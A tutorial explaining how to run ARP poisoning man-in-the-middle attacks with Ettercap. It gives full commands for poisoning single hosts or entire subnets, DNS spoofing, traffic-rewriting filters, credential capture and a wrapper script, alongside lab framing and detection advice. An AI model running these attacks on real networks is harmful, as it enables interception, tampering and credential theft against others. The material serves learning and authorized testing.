How to Use Ettercap for ARP Spoofing: A Step-by-Step Guide
Warning and ethics first: ARP spoofing is a powerful technique that can intercept, modify, or disrupt network traffic. Use it only on networks and devices you own or have explicit permission to test. Unauthorized use is illegal and unethical.
What is ARP spoofing?
Address Resolution Protocol (ARP) maps IP addresses to MAC addresses on a local network. ARP spoofing (also called ARP poisoning) involves sending forged ARP replies that associate the attacker’s MAC address with another host’s IP (commonly the gateway or another device). ARP has no authentication: a host accepts whatever reply arrives and overwrites the existing cache entry, so the forged binding simply replaces the real one. Once that has happened, frames meant for that IP are delivered to the attacker, who can forward, monitor, alter, or drop them.
Ettercap is a mature, versatile tool for performing ARP spoofing and other Man-in-the-Middle (MITM) attacks on LANs. It supports active and passive sniffing, filtering, plugin support, and both command-line and graphical interfaces.
Prerequisites
- A computer running a Unix-like OS (Linux/BSD); Kali Linux and Parrot OS include Ettercap preinstalled.
- Root privileges to configure network interfaces and run packet injection.
- Ettercap installed (version 0.8.x or newer recommended).
- Basic knowledge: IP addressing, subnetting, and ARP.
- A test lab or explicit authorization to test on a live network.
Install Ettercap (if not present):
# Debian/Ubuntu
sudo apt update
sudo apt install ettercap-common ettercap-graphical ettercap-text-only
# Fedora
sudo dnf install ettercap
# From source (if needed)
git clone https://github.com/Ettercap/ettercap.git
cd ettercap
mkdir build && cd build
cmake ..
make
sudo make install
Modes of operation
Ettercap provides several modes:
- Unified sniffing: sniff on one interface. Packets that are not addressed to the attacker are forwarded by Ettercap itself, which is why this is the mode used together with ARP poisoning.
- Bridged sniffing: the attacker sits inline with two interfaces and bridges traffic between them. No poisoning is needed, but you must physically be in the path.
- MITM methods (selected with -M): arp, icmp (ICMP redirects), dhcp (rogue DHCP), port (port stealing) and ndp (the IPv6 equivalent of ARP poisoning). These pull traffic towards the sniffer; ARP poisoning is the one covered here.
- Passive sniffing: start Ettercap without any -M method and observe only what already reaches the interface, for example on a hub or a switch mirror port.
We’ll focus on ARP spoofing using unified sniffing in both the graphical (ettercap -G) and command-line (ettercap -T) modes.
Step 1 — Reconnaissance: identify targets
Before launching ARP spoofing, identify the hosts on the LAN and the default gateway (the “default via” entry shown by ip route on the attacking machine).
Use arp-scan, nmap, or Ettercap’s built-in host discovery.
Example with nmap:
sudo nmap -sn 192.168.1.0/24
Ettercap can also build the host list itself. Started in text mode without the -z (silent) option, it ARP-scans every address in the interface’s netmask on startup and reports how many hosts were added to the list; press l to print that list, h for the other interactive keys, and q to quit:
sudo ettercap -T -i eth0
Note that this scan sends one ARP request per address in the subnet, which is easy to spot; on a network you do not want to alarm, prefer a targeted nmap or arp-scan run.
Step 2 — Enable IP forwarding
Ettercap’s unified sniffing mode forwards the intercepted packets itself: every time it starts it turns kernel IP forwarding off (so that nothing is forwarded twice) and restores the previous value on exit. For the Ettercap-only procedure below this step is therefore not required. Enable kernel forwarding only when another tool does the poisoning and Ettercap merely sniffs, or when you start Ettercap with -u (unoffensive), which tells it to leave forwarding to the kernel:
# Temporary (until reboot)
sudo sysctl -w net.ipv4.ip_forward=1
# Permanent: set net.ipv4.ip_forward=1 in /etc/sysctl.conf (reload with sysctl -p)
Plain ARP MITM needs no NAT: the victim’s packets are forwarded unchanged to the gateway and back, with the victim’s own source address. Add a masquerade rule only if you deliberately want the victim’s traffic to leave with your address as source (noisier, and rarely what you want), or a nat PREROUTING redirect if you plan to send selected ports into a local transparent proxy:
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Step 3 — Launch ARP spoofing with Ettercap (graphical)
- Start Ettercap GUI:
sudo ettercap -G
- Select your network interface (e.g., eth0 or wlan0).
- Perform host scan: Hosts -> Scan for hosts.
- Open Hosts list: Hosts -> Hosts list. Select the target (victim) and add to Target 1. Select the gateway (router) and add to Target 2.
- Start MITM: Mitm -> ARP poisoning. In the dialog, tick “Sniff remote connections.” so that the victim’s traffic to hosts beyond the gateway (i.e. the internet) is captured too; this is the GUI equivalent of arp:remote on the command line. Click OK.
- Start sniffing: Start -> Start sniffing.
You’re now in the middle of victim <-> gateway communication. Use the Sniffing or Connections windows to view active connections. You can save captured data to a pcap file for later analysis.
Step 4 — Launch ARP spoofing with Ettercap (command-line)
Command-line is useful for scripting and headless setups.
Basic ARP poisoning between victim (192.168.1.100) and gateway (192.168.1.1):
sudo ettercap -T -q -M arp:remote /192.168.1.100/ /192.168.1.1/
Flags:
- -T: text-only mode (interactive keys still work: h for help, q to quit)
- -q: quiet; suppress the per-packet dump and print only messages and dissected data
- -M arp:remote: use ARP poisoning as the MITM method. The remote parameter tells Ettercap to also sniff connections between the victim and hosts beyond the gateway; without it only traffic between the two targets themselves is captured. A second parameter, oneway (arp:remote,oneway), poisons only in the direction from target 1 to target 2.
- /IP/: target specification, in the form MAC/IPs/PORTs. Builds with IPv6 support (including Kali’s) use MAC/IPs/IPv6/PORTs, so a single IPv4 host is written /192.168.1.100// there. Empty fields match anything, and the IP field accepts ranges and comma-separated lists (192.168.1.10-20,192.168.1.50) or hostnames.
To poison every host in the subnet against the gateway (be careful: this rewrites the ARP cache of every machine on the LAN and routes all of their traffic through you; a crash or a slow attacker box takes the whole network down):
sudo ettercap -T -q -M arp:remote /192.168.1.2-254/ /192.168.1.1/
An empty target (//) means “every host in the hosts list”, which has the same effect.
To log to a pcap file:
sudo ettercap -T -q -w capture.pcap -M arp:remote /192.168.1.100/ /192.168.1.1/
Step 5 — Use filters to modify or inspect traffic
Ettercap supports packet filters written in its own filtering language and compiled with etterfilter. A filter can inspect and rewrite payloads, drop packets, or inject content into a session, for example to alter HTTP pages in transit.
Example: a simple filter that replaces “Hello” with “Hi” in HTTP requests. Create hello.filter:
# Only client-to-server HTTP traffic (destination port 80); use tcp.src == 80 for responses.
if (ip.proto == TCP && tcp.dst == 80) {
    # DATA.data is the packet payload; search() is a plain byte-string match.
    if (search(DATA.data, "Hello")) {
        replace("Hello", "Hi");
        msg("Replaced Hello with Hi\n");
    }
}
Compile and load:
sudo etterfilter hello.filter -o hello.ef
sudo ettercap -T -q -F hello.ef -M arp:remote /192.168.1.100/ /192.168.1.1/
Filters are powerful but can break protocols, so test them in a controlled environment. Three things bite in practice: a replacement of different length changes the TCP payload size, and Ettercap has to rewrite sequence and acknowledgement numbers for the rest of that session; matching is done on raw bytes, so a gzip-compressed HTTP response never contains “Hello” in the clear (the usual trick is a second rule that rewrites the client’s Accept-Encoding header so the server answers uncompressed); and tcp.dst == 80 matches only requests to the server, so responses need their own tcp.src == 80 branch. None of this touches HTTPS, whose payload is encrypted end to end.
Step 6 — Plugins and extensions
Ettercap includes plugins that extend its functionality; list the ones installed on your system with ettercap -P list.
Plugins relevant to ARP work:
- dns_spoof: answer DNS queries for configured names with addresses you choose.
- chk_poison: check whether the poisoning actually took effect on the targets.
- repoison_arp: re-poison a victim as soon as it refreshes its cache with a broadcast ARP request.
- arp_cop: report suspicious ARP activity on the LAN; useful on the defensive side as a quick detector.
Enable DNS spoofing (with Ettercap’s dns_spoof plugin):
- Add the mappings to /etc/ettercap/etter.dns (etter.conf holds Ettercap’s global settings, not DNS records). The file uses a zone-like syntax, one record per line, such as www.example.com A 192.168.1.50; wildcards like *.example.com are accepted. The plugin can only answer queries that pass through the sniffer, so the ARP attack must be running.
- Load plugin in GUI (Plugins -> Manage Plugins) or CLI:
sudo ettercap -T -q -P dns_spoof -M arp:remote /victim/ /gateway/
Step 7 — Stopping and cleanup
- Stop Ettercap (GUI: Start -> Stop sniffing; CLI: press q or Ctrl+C). On shutdown Ettercap re-ARPs the victims, i.e. sends them the real MAC addresses again so their caches recover. Killing it with SIGKILL skips this and leaves the LAN broken until the poisoned entries expire.
- Disable IP forwarding if you enabled it:
sudo sysctl -w net.ipv4.ip_forward=0
- Remove iptables rules you added:
sudo iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE
Detection and mitigation (brief)
Signs of ARP spoofing that a defender can watch for:
- Two IP addresses (typically the gateway and one other host) resolving to the same MAC, or the gateway’s MAC changing. Tools such as arpwatch, or Ettercap’s own arp_cop plugin, alert on exactly this.
- A steady stream of unsolicited ARP replies from one host: Ettercap re-sends its poison replies periodically to keep the caches poisoned.
- Dynamic ARP Inspection logs on managed switches, which record dropped replies and the offending port.
To mitigate:
- Dynamic ARP Inspection together with DHCP snooping and port security on switches, so a port may only claim the IP/MAC binding the switch saw DHCP assign.
- Static ARP entries for critical hosts (gateways, servers) where the population is small enough to manage.
- Network segmentation and VPNs, to keep untrusted clients off the same broadcast domain as sensitive traffic.
- Encryption with authentication (HTTPS with certificate validation, SSH with host-key checking). This does not stop the interception itself, but it reduces the attacker to denial of service and makes tampering detectable.
Troubleshooting tips
- If the victim loses connectivity, check that Ettercap is still running: in unified mode it does the forwarding itself and turns kernel ip_forward off for the duration, so the sysctl value is irrelevant while it runs. Only if another tool does the poisoning, or you used -u, do net.ipv4.ip_forward and the iptables FORWARD chain matter.
- If nothing is captured, confirm on the victim that its ARP cache now lists your MAC for the gateway (arp -a or ip neigh), and that you used arp:remote / “Sniff remote connections” so traffic beyond the gateway is included.
- In VM labs the virtual switch must allow promiscuous mode on the attacker’s adapter (VirtualBox host-only and internal networks deny it by default); otherwise you see only your own traffic.
- Wireless networks with client isolation (AP isolation) prevent MITM between clients.
- Modern networks may stop ARP spoofing outright: Dynamic ARP Inspection on managed switches drops the forged replies, and an IDS/IPS will log them.
- Double-check the interface, the target IPs and the slash count of the target specification. Poisoning the wrong host, or an accidentally empty (“any”) target, can disconnect you and others from the network.
Example practical lab scenario (concise)
- Lab: Kali VM (eth0: 192.168.56.101), Gateway: 192.168.56.1, Victim VM: 192.168.56.102.
- Enable IP forwarding.
- Start Ettercap text mode:
sudo ettercap -T -w lab.pcap -M arp:remote /192.168.56.102/ /192.168.56.1/
- Observe HTTP credentials in lab.pcap with Wireshark, or test a simple filter to inject content.
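The lab above as one script, added here as an example; it is not part of Ettercap or of the original guide. It assumes the lab addresses above, a Linux attacker with sysctl, and an Ettercap build with IPv6 support, which is why targets are written /ip// (drop one slash for an IPv4-only build). Until it is run as root with four arguments it only composes and prints the command line, so the targets can be reviewed before a single ARP frame is sent.

```shell
#!/bin/sh
# Added example for this guide, not part of Ettercap. Wraps steps 2, 4 and 7
# of the lab: validates both targets, builds the Ettercap command line for
# review, runs it, and restores the kernel forwarding setting on exit.
# Assumed lab: eth0, victim 192.168.56.102, gateway 192.168.56.1, lab.pcap.
set -eu

# Accept only a dotted-quad IPv4 address. A typo must not turn into an
# empty target field, which Ettercap reads as "any host".
valid_ipv4() {
    case $1 in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s' "$1" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for octet; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

# Ettercap's TARGET syntax is MAC/IPs/PORTs, or MAC/IPs/IPv6/PORTs in builds
# with IPv6 support (Kali's is one), so a single IPv4 host becomes /<ip>//.
target_spec() {
    printf '/%s//' "$1"
}

# Print the full command line without running it.
# $1 = interface, $2 = victim IP, $3 = gateway IP, $4 = pcap file
build_cmd() {
    valid_ipv4 "$2" || { echo "bad victim address: $2" >&2; return 1; }
    valid_ipv4 "$3" || { echo "bad gateway address: $3" >&2; return 1; }
    [ "$2" != "$3" ] || { echo "victim and gateway must differ" >&2; return 1; }
    # -T text mode, -q no packet dump, -w write a pcap, arp:remote so the
    # victim's traffic to hosts beyond the gateway is captured as well.
    printf 'ettercap -T -q -i %s -w %s -M arp:remote %s %s\n' \
        "$1" "$4" "$(target_spec "$2")" "$(target_spec "$3")"
}

# Ettercap forwards by itself in unified mode and turns kernel forwarding
# off while it runs; we only make sure the box is left as we found it.
run_lab() {
    cmd=$(build_cmd "$@") || return 1
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    saved_fwd=$(sysctl -n net.ipv4.ip_forward)
    trap 'sysctl -q -w net.ipv4.ip_forward="$saved_fwd"; echo "ip_forward restored to $saved_fwd"' EXIT
    echo "running: $cmd"
    # q or Ctrl+C stops Ettercap, which re-ARPs the victims before exiting.
    # $cmd is word-split on purpose: every field was validated above.
    $cmd
}

case $# in
    4) run_lab "$@" ;;
    0) echo "dry run: $(build_cmd eth0 192.168.56.102 192.168.56.1 lab.pcap)" ;;
    *) echo "usage: $0 <iface> <victim-ip> <gateway-ip> <pcap>" >&2; exit 2 ;;
esac
```

Run as sudo ./lab.sh eth0 192.168.56.102 192.168.56.1 lab.pcap; without arguments it only prints the command it would run. The IP validation is the part worth keeping even if you type the command by hand: an empty field in an Ettercap target is “any”, and one missing octet is the difference between poisoning one lab VM and poisoning the whole segment.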
Final notes
Ettercap is a flexible tool for learning about MITM attacks and network vulnerabilities. Use it responsibly in controlled environments or with clear authorization. Understanding ARP and proper mitigations helps defenders and testers alike.